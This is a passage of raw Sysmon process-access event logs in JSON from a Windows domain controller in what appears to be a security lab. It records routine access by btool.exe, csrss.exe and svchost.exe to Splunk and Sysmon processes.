Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-1102-5F25-0000-001000680500}","SourceProcessId":"1576","SourceThreadId":"1584","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-0010C1680500}","TargetProcessId":"4100","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3357,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-0010C1680500}\r\nTargetProcessId: 4100\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-0010C1680500}","TargetProcessId":"4100","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3358,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3359,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3360,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3361,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3362,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3363,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3364,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.616\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.616","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 